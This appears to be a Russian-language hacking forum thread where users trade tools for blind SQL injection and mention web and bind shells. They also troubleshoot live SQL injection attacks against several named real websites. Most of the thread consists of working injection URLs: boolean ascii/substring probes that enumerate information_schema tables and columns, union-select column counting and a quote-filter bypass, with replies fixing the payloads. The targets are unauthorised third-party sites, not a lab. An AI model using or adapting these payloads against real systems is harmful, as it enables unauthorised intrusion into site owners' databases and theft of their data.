Ваши вопросы по уязвимостям.

Он не может даже скачать бинд скрипт на перле.Где его можно надыбать ?

 

Велемир, хватит использовать с99 везде и всюду. Есть и другие шеллы.

или погугли bind.pl

 

кто нибудь дайте линк на словари таблиц на Mysql. Раньше юзал но шас хз не помню

 

здесь есть:

тут

 

Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор

 

Неужели в гугле не найти?
Тот же sipt4..

 

Скрипт от Грея
залил
_http://www.sendspace.com/file/6e3r62
а вообще..ещё посоветую bsqlbf

 

спс у меня sipt4 есть, но как раз для него ещу дополнително

 

Меня он вполне устраивает.

 

ага,повторил,что такое BIND сервер и даже вспомнил команду bind в никсах )

 

blind sql inj

Нету в сипте 4 посимвольного брута....


Еще вопрос по blind...

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--

Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...

терь вопрос почему

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--

и

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--

Возвращают одинаковые результаты...
таблица 0x276E65777327=news точно есть, т к

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--

 

2DeepXhadow как нет посимвольного брута в сипт4?
select+table_name+from+information_schema.tables+limit+{N16-300},1

 

DeepXhadow

Code:

http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6E657773+limit+1,1),1,1))>=1--

1) При выводе колонок тоже нужен limit;
2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327.

 

Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?

 

nemaniak а ты попробуй какимнить http дебагером! типа Accessdiver

я глянул полей с выводом нема ((

 

а после редиректа нет полей с выводом? часто бывает что они присутствуют. Ежели нету, но хочется норм.скули - поищи ее в другом месте.

 

http://www.clavesin.ru/articles/index_tplid4_recid3'.html

without redirect

 

http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?

 

Там для выполнения запроса, должна присутствовать одинарная ковычка в запросе, а она "фильтруется"
http://www.clavesin.ru/articles/index_tplid4_recid3/*'*/.html

 

Code:

http://www.thechimneypot.com/newsletter.php?id=11+order+by+5--
http://www.thechimneypot.com/newsletter.php?id=-1+union+select+1,2,3,4,5

Union'ом подобрал до 50 - без результатов.